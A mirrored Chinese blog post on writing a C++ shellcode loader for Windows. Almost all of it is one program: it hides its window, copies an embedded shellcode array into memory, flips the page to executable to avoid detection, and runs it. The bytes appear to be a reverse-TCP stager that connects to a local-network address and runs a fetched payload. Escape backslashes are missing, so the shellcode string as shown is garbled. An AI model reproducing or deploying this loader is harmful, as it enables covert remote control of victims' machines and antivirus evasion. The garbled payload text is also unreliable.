zoukankan      html  css  js  c++  java

  • C++之加载器编写(二)

    #include <Windows.h>
#include <stdio.h>
using namespace std;

#pragma comment(linker,"/subsystem:"Windows" /entry:"mainCRTStartup"") 

int main(int argc, char **argv) {
	DWORD dwOldProtect; //自己定义个内存的属性页
	char ShellCode[] = "xfcxe8x8fx00x00x00x60x89xe5x31xd2x64x8bx52x30"
		"x8bx52x0cx8bx52x14x31xffx0fxb7x4ax26x8bx72x28"
		"x31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7x49"
		"x75xefx52x8bx52x10x57x8bx42x3cx01xd0x8bx40x78"
		"x85xc0x74x4cx01xd0x8bx48x18x8bx58x20x50x01xd3"
		"x85xc9x74x3cx49x31xffx8bx34x8bx01xd6x31xc0xac"
		"xc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24"
		"x75xe0x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1c"
		"x01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59"
		"x5ax51xffxe0x58x5fx5ax8bx12xe9x80xffxffxffx5d"
		"x68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26"
		"x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54x50x68"
		"x29x80x6bx00xffxd5x6ax0ax68xc0xa8x7ax01x68x02"
		"x00x82x35x89xe6x50x50x50x50x40x50x40x50x68xea"
		"x0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5x74x61"
		"xffxd5x85xc0x74x0axffx4ex08x75xecxe8x67x00x00"
		"x00x6ax00x6ax04x56x57x68x02xd9xc8x5fxffxd5x83"
		"xf8x00x7ex36x8bx36x6ax40x68x00x10x00x00x56x6a"
		"x00x68x58xa4x53xe5xffxd5x93x53x6ax00x56x53x57"
		"x68x02xd9xc8x5fxffxd5x83xf8x00x7dx28x58x68x00"
		"x40x00x00x6ax00x50x68x0bx2fx0fx30xffxd5x57x68"
		"x75x6ex4dx61xffxd5x5ex5exffx0cx24x0fx85x70xff"
		"xffxffxe9x9bxffxffxffx01xc3x29xc6x75xc1xc3xbb"
		"xf0xb5xa2x56x6ax00x53xffxd5";
	void *exec = VirtualAlloc(NULL, sizeof ShellCode, MEM_COMMIT, PAGE_READWRITE);//这里只申请可以读写的属性
	//memcpy(exec, ShellCode, sizeof ShellCode);
	CopyMemory(exec, ShellCode, sizeof ShellCode);//copy入可读写的内存页中
	VirtualProtect(exec, sizeof ShellCode, PAGE_EXECUTE, &dwOldProtect);//修改属性为可执行

	Sleep(3000);

	((void(*)())exec)();
	return 0;
}
    联系邮箱:yang_s1r@163.com 博客园地址:https://www.cnblogs.com/Yang34/
  • 相关阅读:
    Extension Methods (C# Programming Guide)
    ArraySegment
    git config
    0.0.0.0 IPAddress.Any 【】127.0.0.1 IPAddress.Loopback 【】localhost
    public static float CompareExchange(ref float location1,float value,float comparand)
    ConcurrentDictionary中的 TryRemove
    enum类型
    Array.Copy vs Buffer.BlockCopy
    伴随待字闺中的生命周期分析
    Twitter实时搜索系统EarlyBird
  • 原文地址:https://www.cnblogs.com/Yang34/p/14398664.html
Copyright © 2011-2022 走看看